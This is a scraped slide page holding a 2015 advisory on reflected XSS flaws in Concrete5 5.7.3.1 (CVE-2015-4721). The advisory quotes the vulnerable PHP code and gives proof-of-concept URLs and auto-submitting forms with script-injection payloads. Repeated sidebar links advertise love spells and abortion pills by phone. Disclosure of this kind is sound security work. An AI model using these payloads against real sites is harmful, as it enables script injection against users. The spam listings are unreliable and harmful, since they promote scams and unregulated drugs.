%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...masabamasaba
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationJuha-Pekka Tolvanen
 
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfonteinmasabamasaba
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyviewmasabamasaba
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park masabamasaba
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Bert Jan Schrijver
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...masabamasaba
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...masabamasaba
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is insideshinachiaurasa2
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfkalichargn70th171
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrandmasabamasaba
 

Dernier (20)

%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go Platformless
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
 
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastArchitecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the past
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the Situation
 
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 

Concrete5 Multiple Reflected XSS Advisory

  • 1. Edition: 1.0 Last Edit: 24/06/2015 Cassification: Not restricted Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1 Author: Egidio Romano
  • 2. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4  Summary Vulnerabilities Class Cross Site Scripting (XSS) CVE ID CVE-2015-4721 Remote Yes Local No Published June 6, 2015 Updated June 24, 2015 Credit Egidio Romano Vulnerable Version 5.7.3.1 and probably prior versions Fixed On 5.7.4 Other References https://hackerone.com/reports/59661 http://blog.mindedsecurity.com/2015/06/multiple- security-issues-discovered-in-concrete5-part1.html  Description Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.  Vulnerabilities Details Following are the reflected XSS vulnerabilities identified:  File: /concrete/views/panels/details/page/versions.php (lines 5-14): <?php foreach($_REQUEST['cvID'] as $cvID) { $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked); $checked = false; } print $ih->tabs($tabs); foreach($_REQUEST['cvID'] as $cvID) { ?>
  • 3. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/4 <div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%"> <iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" /> User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these: http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscri pt%3Ealert%28/XSS/%29%3C/script%3E%3C!-- http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/if rame%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35): public function selectUser($fieldName, $uID = false, $javascriptFunc … $selectedUID = 0; if (isset($_REQUEST[$fieldName])) { $selectedUID = $_REQUEST[$fieldName]; } else if ($uID > 0) { $selectedUID = $uID; } $html = ''; $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary- selected-item-inner"><strong class="ccm-summary-selected-item-label">'; if ($selectedUID > 0) { $ui = UserInfo::getByID($selectedUID); $html .= $ui->getUserName(); } $html .= '</strong></div>'; $identifier = new ConcreteCoreUtilityServiceIdentifier(); $selector = $identifier->getString(32); $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog- modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>'; $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';/> User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
  • 4. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/4 http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscrip t%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/elements/group/search.php (lines 4-20): $searchRequest = $_REQUEST; $result = Loader::helper('json')->encode($controller->getSearchResultObject()- >getJSONObject()); $tree = GroupTree::get(); $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID); $registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID); ?> <style type="text/css"> div[data-search=groups] form.ccm-search-fields { margin-left: 0px !important; } </style> <div data-search="groups"> <script type="text/template" data-template="search-form"> <form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm- search-fields-none"> <input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" /> User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this: http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3 C/script%3E  URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon"> <input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'> </form>
  • 5. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 4/4 <script>document.forms[0].submit()</script> </body> </html>  URL: http://[host]/index.php/dashboard/pages/single User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/pages/single"> <input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'> </form> <script>document.forms[0].submit()</script> </body> </html>  File: /concrete/attributes/select/form.php (lines 55-60): $vals = $this->post('atSelectNewOption'); if (is_array($vals)) { foreach($vals as $v) { ?> <div class="newAttrValue"> <?php echo $form->hidden($this- >field('atSelectNewOption') . '[]', $v)?> <span class="badge"><?php echo $v?></span> /> User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.